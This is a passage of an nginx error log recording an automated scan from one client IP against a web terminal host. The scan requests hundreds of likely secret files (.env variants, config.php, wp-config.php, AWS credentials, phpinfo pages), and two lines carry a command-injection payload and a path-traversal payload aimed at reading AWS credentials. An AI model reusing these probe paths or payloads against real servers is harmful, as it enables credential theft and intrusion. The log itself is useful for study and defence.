/.env_old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.zshenv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.development.sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.rbenv-version HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env-sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.prod.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.travis HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.test.sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.2 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.vscode/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /printenv.tmp HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.flaskenv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.test.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.jenv-version HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.envrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.dist HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.sample.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.venv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.prod.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.test.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/config?cmd=cat%20/root/.aws/credentials HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /k8s/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /public/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /web/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.development HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.live HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backend/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/database.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/mail.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/app.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/services.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /configuration.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.aws/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/aws.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/sendgrid.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/mailgun.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sendgrid.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /aws.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:41 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /secrets.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/secrets.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /private/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backup/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dev/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /staging/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /production/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /laravel/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backup/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /private/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /settings.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/settings.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/settings.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /database.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/database.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /administrator/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cms/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /portal/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dashboard/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /crm/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /mail/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /mailer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /deployment/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /helm/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /terraform/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ansible/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/mail.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/smtp.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/database.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /secrets/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /private/keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:42 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env_example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /core/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backend HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /local/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /application/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_profiler/phpinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/settings.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /new/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /new/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /new/.env.production HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /new/.env.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_profiler/phpinfo/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_profiler/phpinfo/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /aws-secret.yaml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /awstats/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /conf/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cron/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /www/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker/app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.backup HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /xampp/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /lara/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /lara/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /laravel/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /js/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /laravel/core/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /nginx/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /site/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /xampp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.docker/laravel/app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /laravel/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /laravel/.env.production HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /laravel/.env.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /laravel/core/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:43 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /laravel/core/.env.production HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /laravel/core/.env.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /bootstrap/cache/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /storage/app/private/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: 